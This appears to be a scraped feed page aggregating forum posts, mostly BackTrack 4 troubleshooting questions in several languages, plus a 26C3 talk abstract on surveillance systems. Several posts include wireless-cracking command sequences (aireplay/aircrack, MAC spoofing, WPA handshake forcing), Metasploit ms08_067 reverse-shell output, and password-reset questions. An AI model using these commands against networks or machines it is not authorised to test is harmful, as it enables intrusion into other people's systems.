This is a major failure of your software management system. Please check for broken packages with synaptic, check the file permissions and correctness of the file '/etc/apt/sources.list' and reload the software information with: 'sudo apt-get update' and 'sudo apt-get install -f'.
|
Cela est il due à un problème de droits sur les fichiers?
sudo apt-get update me renvoi:
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid Release.gpg
Ign [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/main Translation-en_US
Ign [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/universe Translation-en_US
Ign [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/restricted Translation-en_US
Ign [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/multiverse Translation-en_US
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce Release.gpg
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/main Translation-en_US
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid Release
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/microverse Translation-en_US
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/macroverse Translation-en_US
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/restricted Translation-en_US
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/universe Translation-en_US
Ign [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/multiverse Translation-en_US
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce Release
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/main Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/main Packages
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/universe Packages
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/restricted Packages
Hit [xrl=hxxp://archive.ubuntu.com]Index of /[/url] intrepid/multiverse Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/microverse Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/macroverse Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/restricted Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/universe Packages
Hit [xrl=hxxp://archive.offensive-security.com]SUN Backtrack Linux Repository[/url] pwnsauce/multiverse Packages
Reading package lists... Done
Donc apparemment pas de soucis, mais par contre sudo apt-get install -f
me renvoi un code erreur
Reading package lists... Done
Building dependency tree
Reading state information... Done
Correcting dependencies... Done
The following packages were automatically installed and are no longer required:
pymacs python-psyco samdump2-menu python-mode pyrit milw0rm pyrex-mode
framework3-libs netdiscover-menu pychecker
Use 'apt-get autoremove' to remove them.
The following extra packages will be installed:
scapy2
The following NEW packages will be installed:
scapy2
0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
9 not fully installed or removed.
Need to get 0B/397kB of archives.
After this operation, 2597kB of additional disk space will be used.
Do you want to continue [Y/n]? y
(Reading database ... 232402 files and directories currently installed.)
Unpacking scapy2 (from .../scapy2_2.1-bt1_all.deb) ...
dpkg: error processing /var/cache/apt/archives/scapy2_2.1-bt1_all.deb (--unpack):
trying to overwrite `/opt/kde3/share/applications/external/scapy.desktop', which is also in package scapy-menu
Processing triggers for man-db ...
Errors were encountered while processing:
/var/cache/apt/archives/scapy2_2.1-bt1_all.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)
et la je bloque j'arrive pas a voir par ou aller pour me dépêtrer de tout ca.
Si quelqu'un pouvait éclairer ma lanterne dans ce sombre moment ca m'aiderai beaucoup.
A bientot.
-
-
21:12
»
SecDocs
Authors:
Andy Müller-Maguhn Tags:
network intelligence information operation phone Event:
Chaos Communication Congress 26th (26C3) 2009 Abstract: "Intelligence Support Systems" stand for a wide range of hard- and softwareproducts made to intercept and analyze data from telecommunication- and other datastreams as well as data from surveillance technology. The talk will give a brief overview of how this industry works, to whom these products are available and what the capabilities are. A whole industry has been growing providing systems to intercept and analyse data from various sources - serving governments and other interested parties to improve surveillance on the subjects of interests formerly known as citizens. This technology does not only change the way governments work, it´s implications for our rights on informational self-determination are fundamental. It does not only allow to analyse and graphically view human behaviour, but also the behavioural changes in the context of interactions and events. In this talk i do not only want to give an overview on the tools of intelligence support, but also raise the question what kinds of escape and protection from this type of democracy-killing technology is possible.
-
-
16:18
»
Hack a Day
[Rahul Sapre] sent us a guide to porting EFSL to any microcontroller (PDF). The Embedded Filesystems Library adds FAT support to C compiled microcontrollers. It is targeted at the AVR line of chips but can be adapted to any architecture that works with a C compiler. [Rahul's] guide will take you through the process of [...]
-
-
7:40
»
remote-exploit & backtrack
Bonjour à tous.
je suis nouveau sur le site donc pas tres vaillant.
pour faire court mon probleme est tout simplement que je n'arrive pas a lancer l'interface graphique de "wicd" quand je clic sur celle-ci rien ne ce passe je ne peut alors pas detecter ma box qui est a proximité.
j'ai bien éssayé les commande ifconfig iwconfig les aimon-ng et autre mais sans succé .
je remercie d'avance les spécialiste
-
5:39
»
remote-exploit & backtrack
I have switched from BT3 to BT4 on my Macbook Pro 2.1.
My wifi card is Atheros and is detected and working out of the box. In Bakctrack 3 when I used airmon-ng and airodump-ng the signal power was shown in positive dBs but now it's all negative.
It can still inject packets and sniff around but is this normal or should I update the drivers or smt?
Thanks
-
0:54
»
remote-exploit & backtrack
bonjour, je n'arrive pas aller sur internet avec du bt4 et Mozilla Firefox pendant qu'avec du bt3 tout ok , j'utilise une connexion cable pas wifi. :mad::mad:
-
0:35
»
remote-exploit & backtrack
hello Everybody!!!
i have decided to install backtrack 4 on my laptops hard drive, as i was using BT3 off a live cd, now bt3 never gave me a problem with my wifi card which is an intel 3945. after i finished instaling bt4 i tried using my wifi and notice that it doesn't detect it, can anybody please help me out?? also i tried cracking my own wep with backtrack 4 just like i did on bt3 but notice the command ares different can anybody help me out if possible??
i used to use this command:
modprobe -r iwl3945
modprobe ipwraw
ifconfig wifi0 down
airmon-ng stop wifi0
macchanger --mac
airmon-ng start wifi0
airodump-ng wifi0
airodump -c -w --bssid wifi0
aireplay-ng -1 0 -a -h -e wifi0
aireplay-ng -3 -b -h wifi0
aircrack-ng -n64 -b (whatever the name was).01.cap
has any of this change on bt4??
sorry if my questions are too stupid but if i never ask i will never know
-
0:35
»
remote-exploit & backtrack
hello Everybody!!!
i have decided to install backtrack 4 on my laptops hard drive, as i was using BT3 off a live cd, now bt3 never gave me a problem with my wifi card which is an intel 3945. after i finished instaling bt4 i tried using my wifi and notice that it doesn't detect it, can anybody please help me out?? also i tried cracking my own wep with backtrack 4 just like i did on bt3 but notice the command ares different can anybody help me out if possible??
i used to use this command:
modprobe -r iwl3945
modprobe ipwraw
ifconfig wifi0 down
airmon-ng stop wifi0
macchanger --mac
airmon-ng start wifi0
airodump-ng wifi0
airodump -c -w --bssid wifi0
aireplay-ng -1 0 -a -h -e wifi0
aireplay-ng -3 -b -h wifi0
aircrack-ng -n64 -b (whatever the name was).01.cap
has any of this change on bt4??
sorry if my questions are too stupid but if i never ask i will never know
-
-
18:24
»
remote-exploit & backtrack
this wasent the question i was going to ask. i was going to ask why my wifi wasent working when it worked in bt4 pre final but as i was typing the question i remembered my wifi led never changed color with pre final so i tested it thats working fine i figured out on my own how to get the ethernet working.
so now my question is how do i install flash player 10 for youtube videos
theres a drop down list that says taz apt other linux filetypes ect
im not sure which type to pick
do i need to have bt4 installed for it to even download the file
and if so whats the easiest way to dual boot with windows 7
windows 7 will be on the 140 gb partion
and bt4 on the 10 gb partion
thanks for your time and effort in posting a reply
i seem to have forgotten alot i have learned which hopefully ill remember by exploring this great new final release
-
14:52
»
remote-exploit & backtrack
About my setup:
MacBook Pro Santa Rosa (mid 2007) 2.4 GHz Core 2 Duo
When I got my new 500gb hard drive, I partitioned it with 420gb for OS X, 40gb for Windows, and 40gb for Linux.
I then installed rEFIt and Windows 7 which all worked properly.
Last night I installed BackTrack 4 Pre-Final, resizing the Linux partition to 38gb to create a 2gb swap. Once the installation was done, BackTrack worked fine, and OS X still worked fine. Though when selecting Windows or Linux from rEFIt, I get the same Grub boot picker screen. First question: how can I get rid of this?
Second and more important problem: When I choose Windows from the Grub menu, I instantly get a Windows screen telling me there is an error with \Boot\BCD and that "an error occured while attempting to read the boot configuration data."
It would seem grub did something to mess up Windows' boot loader. When I insert my Windows 7 disc to try and repair it, the disc tells me something about it not being compatible with the OS installed.
Any ideas as to what I can do to get Windows to boot?
-
14:37
»
remote-exploit & backtrack
HI mate,
When i run for a long time the live cd, its suddenly quit from the programs and show a black screen where sometimes is freeze (like a critical error).
Last time it happen when i trying to update the exploit database is that playing any role..
Can anyone help me?
-
12:33
»
remote-exploit & backtrack
Hi all! I hope I am posting to the right section...
I am currently working on a program in C...
What I want to do is not only to call a system's .sh file, but edit the .sh file in a way that the user have the opportunity after running it to set his on variables.
For example:
In my C program in a point I say:
if (a==1) {system ("/home/alex/scripts/prog/macchanger2.sh"); system("/home/alex/Qt/hak/hak);}
Well, the problem is that the macchanger2.sh is something like this:
echo "Type your new mac address:"
echo
macchanger -m yy:yy:yy:yy:yy:yy wlan0
How can I tell the script to let the user type his preferable mac address and put it where yy:yy:yy:yy:yy:yy is?
I hope I were understandable enough....If not, plz let me know....
-
9:01
»
remote-exploit & backtrack
bonjour
je voudrais savoir si il est possible d'utiliser un dictionnaire pour aircrack-ng sur un support externe et si oui par quoi commence le chemin d'accès car après nombre d'essais pas moyen ! (ok je suis une buze!)
au passage ... j'ai cru comprendre (ou plutot voulu comprendre) que les rainbowtables ne servent à rien sien si elle n'etait pas créés pour un reseau designé (essid)
c'est ca ? (ou je comprends rien....les 2 peut etre!)
MERCI
-
8:52
»
remote-exploit & backtrack
Hi Fellaz,
I've successfully exploited various win xp machines on my lan in lab environment using SET and aurora exploit but that is locally, how can these exploitz be used against other side of router on MY remote office pcs (ie.) want to try and pentest outside the local lan, will the exploit meterpreter session come back to me on my LHOST 192.168.0.8 address even if not on the same lan. if not how can it be acheived?
Pentest office : attack machine ip 192.168.0.8 public ip 96.xx.xx.xx
Remote office different lan: victim ip 192.168.1.9 public ip 92.xx.xx.xx
MY OWN btw victim machine both owned my myself.
both ip addresses differ 92.xx.xx.xx and 96.xx.xx.xx so how to metasploit past my remote router into the lan side.
As stated I own both networks but not Pwnd yet.
Googled and not found a thing apart from changing LHOST to public ip but thats just the router isnt it?
Kind Regardz DEE
-
-
18:13
»
remote-exploit & backtrack
Okay, so i've been searching for about 2 days and can't find a solution... It's getting frustrating. The things I have found aren't very user friendly in explanation or seem to be really out dated. I have a MacBook Pro running BT4 Final and can't get the right click working. Have tried messing with the xorg.conf file and just can't seem to get it exactly. Any help or links to some place that would explain it in the least confusing fashion would be awesome. :) Thanks in advance for any help.
-
15:23
»
remote-exploit & backtrack
Hi Everyone I am trying to get backtrack onto my 400GB external HDD.
I followed the usb install exactly the way it was done in the video provided by offensive security however when I go to boot I get to assuming drive cache: write through, then I get kicked down to busybox. I know this is caused due to missing files, how do I go about fixing this?
-
13:39
»
remote-exploit & backtrack
Hello
I am using Live DVD of BT4 final version.
When I try to use the sipdump or sipcrack commands, it says that those programs are not installed and you can install it using apt-get command e.g. "apt-get install sipcrack"
So executed "apt-get install sipcrack" and it reported everything is done however running sipcrack again, it still says that sipcrack is not installed.
executed "apt-get install sipdump" but it gave me error "E: can't find sipdump package"
Can anyone help please.
Any suggestions and ideas welcome.
Thanks in advance.
-
11:47
»
remote-exploit & backtrack
Bonjour
j'utilise l exploit windows/smb/ms08_067_netapi avec le payload windows/vncinject/reverse_tcp
j 'ai suivi le tuto a la lettre mais voila ce que j ai :
[*] Started reverse handler on port 4444
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
merci d'avance pour votre aide ^^
-
8:09
»
remote-exploit & backtrack
Hey Leute!
Habe immer wiederkehrend einen Fehler beim versuch Treiber (wlan-treiber) zu komplilieren.
Code:
Wed Feb 3 16:05:27 CET 2010
Installing "ACX100/111" on 2.6.30.9.
patching file common.c
patching file pci.c
make: Entering directory `/usr/src/linux-source-2.6.30.9'
WARNING: Symbol version dump /usr/src/linux-source-2.6.30.9/Module.symvers
is missing; modules will have no dependencies and modversions.
CC [M] /usr/src/drivers/acx-20070101/wlan.o
In file included from /usr/src/drivers/acx-20070101/acx.h:2,
from /usr/src/drivers/acx-20070101/wlan.c:49:
/usr/src/drivers/acx-20070101/wlan_compat.h:224: error: conflicting types for 'irqreturn_t'
include/linux/irqreturn.h:16: error: previous declaration of 'irqreturn_t' was here
make[1]: *** [/usr/src/drivers/acx-20070101/wlan.o] Error 1
make: *** [_module_/usr/src/drivers/acx-20070101] Error 2
make: Leaving directory `/usr/src/linux-source-2.6.30.9'
Worauf lässt dies schließen?
MfG
edit:
Code:
root@bt:~# airdriver-ng install 0
Driver "ACX100/111" specified for installation.
Your current GCC version doesn't match the version your kernel was compiled with.
The build modules will probably not load into the running kernel.
1. Getting the source...OK
2. Extracting the source...OK
3. Getting the patch...OK
4. Patching the source...OK
5. Compiling the source...Running "depmod -ae"...
Failed to install the driver.
Look through "/var/log/airdriver" for errors.
Heißt das ich muss den Kernel neu compilen? oder kann ich irgendwie herausfinden mit welcher gcc version ich arbeiten muss und darauf downgraden?
-
5:49
»
remote-exploit & backtrack
Ok,.. So I goofing around and I been able to force handshakes on a WPA encryption.
Basically, I run the standard airodump with a bssid + .cap file recording it all...
Then run this:
aireplay -1 3000 -e (network name) -a (targets bssid) -h (your bssid) -0 1 -q 10 (interface card name)
This tricks the network to think I am already on the network and lets me on like a reconnect. At this point, I am on, but no access, but when this is used in conjunction with regular I guess wep methods and you keep hitting Ctrl+C and then "up" and enter and keep resigning on and off I been able to force hand shakes under a few min with this. Many times faster sometimes than WEP.
Add an extensive word list and BAM!
So what's good?
-
5:12
»
remote-exploit & backtrack
Ok,. tried playing a game,.. crashed, then crashed again, and again,.. well you see where I am going... Well I read I need to upgrade the Graphic Driver for this.. how would that be done? I have an Intel 945 chipset...
-
2:03
»
remote-exploit & backtrack
I've extracted the .iso and have been using grub to boot the kernel and initrd, but I'd like to make a few changes to the live cd. I've extracted the squashfs, copied my /root folder to save my configuration changes and compressed it again (while in backtrack to make sure I use the proper version of mksquashfs) and re-generated the manifest, using instructions from the ubuntu community docs on live cd customization (can't post link sorry)
However, the changes I made don't show up when I boot, its just a regular bt4 desktop and none of my personal files are on it. I'm positive that the right .squashfs is being used and that it's in the right place, so I'm guessing it's the manifest maybe?
If someone can help me along I'd like to write all this up into a tutorial because a lot of people here seem to be interested in customizing live cds but haven't been having luck with things like linux-live or reconstructor.
-
-
22:13
»
remote-exploit & backtrack
HI,
How can I change the version of my openvas to the latest release (version 3) in BT4 final? Should I uninstall the openvas2 (default in BT4) the install openvas 3 or theres another in BT4.
Thanks a lot
-
8:51
»
remote-exploit & backtrack
Hi Guy's !
I have some problems . Yesterday , I succesfully connected to my WEP netwerk.
But because WEP isn't that safe , i've switches to WPA .
No I Can't connect anymore.
I've tried:
/etc/init.d/networking start , it does some things, and then I do:
/etc/init.d/wicd start , to start wicd , then I can find my network. I've changed the advanced configuration of the network, and entered my WPA key.
(I've tried both options of WPA there , preshared key, and the other one, passphrase I think.)
When I click connect, it says: Validation authentification, and then is says:
'NOT CONNECTED'
I've tried alot! I Also tried the tut here, with the wpa_supplicant.conf file, but when I need to start dhcp , it says that it's not installed.
And I need a connection to install..
Really don't know what to do anymore :/. An1 can help?
I've tried to search the forums, but I really didn't find a solution.. sorry guys.
Thx!
EDIT: Owyeah, I was using a Netgear Wg111v2 , but now i'm using an Alfa AWUS036H . still no luck :(
EDIT: Got a working , wired connection now. Wanted to try the wpa_supplicant tutorial again (xploitz) , but still no luck :( . That's an old old tut voor Backtrack 2 I think. Can't get it working..
-
6:50
»
remote-exploit & backtrack
Hallo BT Gemeinde,
habe ein kleines Problem mit meinem Notebook bei der Installation des ATI Treibers.
Habe mich hier durchgelesen im Forum und verschiedene Methoden ausprobiert und jedesmal tauchten fehler auf oder total Ausfall meiner Xconf.
Verbaut ist in meinem Notebook die ATI FireGL v5200.
Jetzt würde ich Euch gerne fragen ob es eine möglichkeit gibt den fglrx treiber selbst zu erstellen oder ich doch nur den Radeon Treiber verwenden kann muss.
Würde mich über ein kleines howto freuen und bedanke mich bei Euch im voraus
greets Phil
Danke ...
zurzeit hab ich es geschaft den Radeon zu laufen zu lassen ohne 3D aber würde gern die Karte voll nutzen und daher auf den fglrx Treiben nicht verzichten.
:rolleyes:
-
6:02
»
remote-exploit & backtrack
Hello
Could You be so kind and tell me how to make iPhone tethering via Bluetooth on BT4 final?
Regards
Lukanio
-
4:24
»
remote-exploit & backtrack
i found that directory
Code:
/opt/oracle
is oracle installed or can i install it from that directory?
-
3:39
»
remote-exploit & backtrack
Hey all,
BT4 Final works for me. I have issues with Ubuntu with hardware drivers, Windows is useless for everything... so I want to use BT4 Final as my OS for my laptop. The issue I have though is the only install process I can use is PXE. Ubuntu has good documentation on doing this so it wasn't difficult, but just about anything else I'm buggered!
Can anyone advise on how to get BT4 to install over PXE?
Thanks
-
0:32
»
remote-exploit & backtrack
Ok,.. I was happy as can be when I decided to put two operating systems on one internal hard drive, but sadly I have a new delema. The network I am dealing with is simply to far away from router to recipient. So what I have it this.. I have a partition on my internal HD with XP and BT4. Both work great, but the problem is I have to get a dongle and if I am going to do this I am just going to go back into VMware. Is there anyway to remove the partition and go back to the way it was before removing bt4 to later burn to an iso image etc etc...?
Thank you fro the help!
Z
-
0:17
»
remote-exploit & backtrack
Hi, I think this is a simple question, a request for a command. In the past I easily installed BT4 pre-final with persistent changes on a USB stick initially booting from a BT4 DVD. I am now trying to do it while booting BT4 from a bootable USB Memory stick. I followed the directions from the Infosec Ramblings website.
Following the directions, I first created the initial bootable USB stick using unetbootin and it works fine. I booted into BT4.
A dmesg command says the stick I want to make bootable with persistent changes is sdc (the one I booted from is sdb). Everything went fine when I created sdc1 and sdc2 etc. until I got to the "rsync -r" command. The instructions are for the case when you have booted BT4 from a cdrom. "rsync -r /media/cdrom0/*". I am not sure what command to put in when I booted from the memory stick. Every thing I tried lead to an error message. I am sure it is something simple, but I cannot figure out what it is. Any help is appreciated. Thanks in advance.
-
-
16:57
»
remote-exploit & backtrack
I have a X61s, and connected and disconnected the antenna at least 10 times, not more than 20-- and I currently get a weak wireless signal compared to other people (detail below). I am also running a X61s with some Lenovo software, so I'm not sure if the software is lowering the signal, but no matter what I do it still seems like I can't get it as high of a signal. Would removing the antenna connectors (cable at the 3945abg card) that many times damage it? I just bend the cable side up and the connector pops off.
As for low signal... I have a router running Tomato, and other computers in the same room get quality of ~60, and ~35-50 in the adjacent room (quality being dBi difference between noise floor and signal quality). However, my computer gets about 30-40 in room, and 10-20 in the adjacent room--and drops off much quicker a few rooms down.
If I want to fix it, what would I have to replace, or is there some other fix possible? (dip it in solder?)
-
7:24
»
remote-exploit & backtrack
hi habe ueber bt 4 versucht ein wep zu knacken nach einer gewissen zeit gibt mir allerdings aireplay die fehlermeldung, Low Disk Space - KDE Daemon, habe an data auch nur maximal 1200 was kann ich machen? sehe auch nicht wo ich low disk space habe um mehr space frei zu machen?
gruesse
-
-
14:00
»
Packet Storm Security Tools
sydbox is a ptrace-based sandbox implementation. It intercepts system calls, checks for allowed filesystem prefixes, and denies them when checks fail. It has basic support for disallowing network connections. It has basic support to sandbox execve calls. It is based in part on catbox and strace.
-
6:58
»
remote-exploit & backtrack
Hello,
I've installed BT4 on a VMware Workstation.
But for some weird reason it can't see any of my network drives, I have both Ethernet and WiFi.
I tried to play with the VMware network setting for this machine, NAT and Bridge, nothing.
Also, I installed the machine as Ubuntu, I figured since both Ubuntu and BT4 are based on Debian it should be ok.
I tried to look through the forum but was unable to find anything related threads that can fix my problem.
Any advice?
Thank you.
-
5:51
»
remote-exploit & backtrack
i want a wordlist as we call it for a list of number from 1000000 to 9999999
but with a 101-prefix to the list generated, i.e 1011000000, 10110000001,...
1019999999 like that.
i searched and found many but with none i'm able to get to generate a list like this. someone can guide me, then it would be great. i want any program name and the correct argument to pass to get this sort of list printed.
-
-
15:45
»
remote-exploit & backtrack
I tried loading BT4 on my T500 and when I tried to use "startx" I get X
X: warning; process set to priority -1 instead of requested priority 0
and then it goes to Fatal server error:
no screens found
giving up.
xinit: Connection refused (errno 111): unable to connect to X server
xinit: No such process (errno 3): Server error.
I can't seem to load it up. If someone could help me with this that would be awesome. Thanks in advance.
-
15:27
»
remote-exploit & backtrack
has anyone uploaded backtrack 4 final to any sites for download?
i tried the torrent and it was corrupted and now ive tried downloading
from the site but the download is way to slow or the site goes down
and i have to restart the dl.
so, any mirrors?
-
13:53
»
remote-exploit & backtrack
Ok,..
I am brand new to backtrack and jumped on like literally days before BT4 came out. But here is my delema. I bought a USB 2 gig memory stick for BT3 works great! However, BT4 is said to have an 8 gig requirement. I don't feel like running back to the store and buying another usb memory stick, cause I have an External 1 terabyte Hard drive (which is plenty large enough). I would use this like a secondary HD on my laptop. However, I have a large amount of files on there already. Is there a way I can set BT4 up to run on the External HD on start up (I know how to boot it in bios) and not have the current files being damaged? Do I use the USB install that came with BT4 on the desktop? Also,.. how do I set up BT4 to be able to save settings and files on the desktop? I essentially would like to use BT4 as an operating system on it's own bypassing the internal HD. Any assistance would be helpful :)
Also,.. I just thought about this... Can I use the 2 gig jump drive to do a dual boot and just use the usb memory stick to hold the boot up logs, then use the external HD to use as operating hard drive? I read that if I install the whole thing on the ExHD it will erase everything on it cause it needs to format... woah I'm lost, lol... Help me out! Please and thank you :)
Z
-
9:22
»
remote-exploit & backtrack
Who had the idea to put all contents of ~ on the Desktop by default?
How do I disable that behavior?
I would like to see a clean desktop with files I put in ~/Desktop but not with everything within ~
Please help ...
-
8:29
»
remote-exploit & backtrack
I've BT4 final (iso) installed on hhd, I'm not be able to connect it by wireless.
PS. Sorry for the english errors: I'm italian.
-
-
4:29
»
remote-exploit & backtrack
Hi !
I've got a Little Question guys .
I've installed my Backtrack 4 on VM Workstation , works perfect so far !
No I wanted to crack my password, of my windows account with Chntpw .
But i've got a little problem :p.
I need to go to the 'disk' where my windows is on , like hda1 , or sda1 ,..
But like I said i've installed Backtrack on VM Workstation , and when I go into a terminal , en do Cfdisk , to see my drives (Right?) I only see the 'Virtual' drives , so not the drive Windows is on.
So my question , Is it possible to crack the windows password, with Backtrack on VM Workstation ? Or do I need to run the live CD ?
Thx!
-
-
23:59
»
remote-exploit & backtrack
Dear back|track users,
I have been experiencing a problem:
Previous search terms -
Searched google and BT for terms along the lines of:
mac spoof(ing) aireplay fake auth(entication) deauthentication packet
and any combination of those, but have not found a definitive answer that addresses the difficulty I'm experiencing.
Platform -
back|track4 pre-final live USB
card1: intel 5100 (bleeding edge driver from dec 2009)
card2: alfa AWUS036H (native rtl8187 drivers from BT4-prefinal)
target AP: Personal D-link router WBR-1310 (10 ft away)
NO MAC filtering set on target AP, WEP enabled
Description of problem:
Boot up BT4
airmon-ng start wlan0 (for alfa)
airodump-ng -c 1 mon0 (to fix the channel at 1)
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==> Fake auth success
change mac:
original mac: XX:XX:XX:XX:XX:BA
new mac : XX:XX:XX:XX:XX:BB (or any other change)
ifconfig wlan0 down; ifconfig mon0 down;
macchanger -m XX:XX:XX:XX:XX:BB wlan0
macchanger -m XX:XX:XX:XX:XX:BB mon0
ifconfig mon0 up;
airodump-ng -c 1 mon0
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==>
Sending Authentication Request (Open System) [ACK]
Authentication successful
Sending Association Request [ACK]
Got a deauthentication packet! (Waiting 3 seconds)
.
.
.
Got a deauthentication packet! (Waiting 5 seconds)
.
.
. etc.
This happens for both Intel 5100 and Alfa AWUS036H
When I attempt an attack on my office router (with permission, namely by me), the mac spoofing doesn't seem to result in dauthentication from router.
What can be done:
1) Injection test, aireplay-ng --test mon0, will result in successful injection on both spoofed mac and original mac
2) With original mac, most attacks on d-link are successful as per tutorials on this page and other sources, including attacks 2,3,4, and subsequent aircracks and dictionary/table attacks. Once connected and ARP poisoned, many other attacks also work as usual.
QUESTION:
+How can the router possibly know what my original mac address is? (Again, NO MAC filters on routers)
+Why does it allow fake auth if I use original mac, but denies authentication when I use other macs (both completely random, or pseudo random spoofing like changing the last digit) ?
+Is there a work around?
Thank you for taking time to read my question, I appreciate any questions regarding my setup or comments on how I can approach the problem.
C.
-
22:22
»
remote-exploit & backtrack
I've installed GNOME, I can not login
Graduated the following message:
the system administrator is not allowed to login from this screen
What is the solution ? :o
thank and reg
-
14:34
»
remote-exploit & backtrack
Hello im having trouble with some wifi cracking im trying the target networks are all on channel 13 i have 2 wifi cards on my laptop a IPW3945 built in jobby and a USB f5d7050b both are working fine on wlano and wlan1. However they wont go to a channel above 11 in airmon or airodump etc.. even using the channel flags i dont get an error but it just uses channel 11.
when i get to using aireplay-ng i get the error " WLAN0 is on channel 11, but the AP uses channel 13"
ive traced this error back to a driver issue the drivers built into bt4 are the US version and they only have 11 wifi channels here in the UK we use channel 13 all the time for some reason ( mainly as BT defaults to that on their equipment they give free with the broadband)
anyway i thought i had found the fix to this
Quote:
The key piece to sorting this out was adding this line to my /etc/modprobe.d/options and then re-starting my system (simple - brute force!):
options cfg80211 ieee80211_regdom="EU"
"iwlist wlan0 channel" previously only reported channels 1 to 11, but now shows all of them. No problems connecting to the AP now on channel 13:
steve@steve-laptop:~$ iwlist wlan0 channel
wlan0 13 channels in total; available frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
( blah blah blah blah )
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency=2.472 GHz (Channel 13)
|
i did all the above and besides the fact i have 32 channels available none of them are 12 13 and 14
what am i doing wrong does anyone know ?? has anyone done this before to get to use channel 13 ?
thanks for your replies please keep them simple i am a total noob
oh forgot to add in windows both these cards work fine in the EU channel bands ..
-
12:26
»
remote-exploit & backtrack
bonsoir,
j'ai un souci,sous chntpw mount ne detect pas mon disque dur ide avec ses 2 partition ( xp et seven).
il detect uniquement le lecteur cd rom...alors que bt 3 le detecte lui.
de plus sous la session 1 mon disque dur et ses 2 parti sont introuvqble, alors que sous session 2 les partitions sont visible mais pas en *local storage* mais en *media* sur dev....
du coup impossible les mount et changer les mdp...
une idee?
-
-
12:53
»
remote-exploit & backtrack
Bonjour,
J'ai pour projet d'acheter un netbook, et je voulais savoir si certain était entièrement compatible avec backtack4 ( chipset wifi compatible, injection possible...)
Le problème c'est que dans les descriptions des configurations, il n'y a pas assez de détails.
Avez-vous vous même un netbook ?
Mon premier choix était un EEE PC de chez Asus, auriez vous des informations sur ses composant ?
Merci d'avance :)
-
-
23:18
»
remote-exploit & backtrack
I wanted to use BT4 basically as a livecd that I can boot from my HDD and run from RAM, with persistent changes. I extracted the iso and copied it to it's own partition, and everything has worked great except for the persistence. I can't really figure out why this isn't working out of the box, maybe it's a grub2 error. I've been researching persistence and grub2, I'll post what I come up with but I'd appreciate help if anyone can see what I'm doing wrong.
/etc/grub.d/40_custom
Code:
menuentry "BT4 toram" {
recordfail=1
if [ -n ${have_grubenv} ]; then save_env recordfail; fi
set quiet=1
insmod ext2
set root=(hd0,12)
search --no-floppy --fs-uuid --set 5bda6579-1fe2-4099-8221-1a9f33f04164
linux /boot/vmlinuz BOOT=casper boot=casper toram persistent rw quiet fix-splash
initrd /boot/initrd.gz
}
-
22:14
»
remote-exploit & backtrack
Hi
I got a 8 gig flash drive, and want to put BT4 on it (temporarily), boot into it from my EEEPC and Install it permanently replacing my currently installed Ubuntu. It is a netbook and can't install from a CD.
How would i go about doing this?
-
21:21
»
remote-exploit & backtrack
I'm trying to hook up Backtrack 4 to my network. I have it installed via VMWare Fusion on an iMac. I started networking and wicd. No wireless networks are showing (some should, not mine), and I go to add a hidden network and type in the SSID. Do I have to be broadcasting instead? When looking at ifconfig I should see a wlan0 connection shouldn't I? There is nothing but the eth0 and lo.
-
18:14
»
remote-exploit & backtrack
I know it's a purely cosmetic question, but has anyone found a desktop app dock that works well with BT4 Final? Can't seem to find any on google or forum search that work with KDE3 debian
If this is the wrong section, i apologize, please move.
-
17:38
»
remote-exploit & backtrack
Bonjour a tous,
Je viens d'installer backtrack 4 final.
J'ai utiliser la clé Wifi usb D-link DWA-140 B2 avec le driver rt2870.
Airmon-ng place la carte en monitoring mais aireplay-ng n'arrive pas a injecter.
Je n'ai vu nulle part des personnes ayant tester le crack wep avec cette clé. Donc je souhaiterais la lister dans les cartes non compatible injection de paquet.
Y'a t-il un emplacement sur ce forum pour ca ?
Sinon es ce que par hazard quelqu'un aurait reussi avec un autre driver ?
Voila ...
Et aussi quels sont les principales cartes wifi compatibles a 100 pour cent monitoring et injection ?
en espérant que certains trouveront réponses a mes questions.
++ all
-
14:05
»
remote-exploit & backtrack
Hi jungs..
Koennt ihr mir ggf. weiterhelfen? ich moechte auf meinem Bootf'higen 8 GB USB stick eine Wordlist speichern sodass ich die in Backtrack aufrofen kann...
Wenn ich BT4 starte und dann zb einen Ordner erstelle ist dieser nach dem n'chsten neustart weg.. denke das ist dann bei der Wordlist nicht anders..
thx
Nawuko
-
7:37
»
remote-exploit & backtrack
Hi there people,
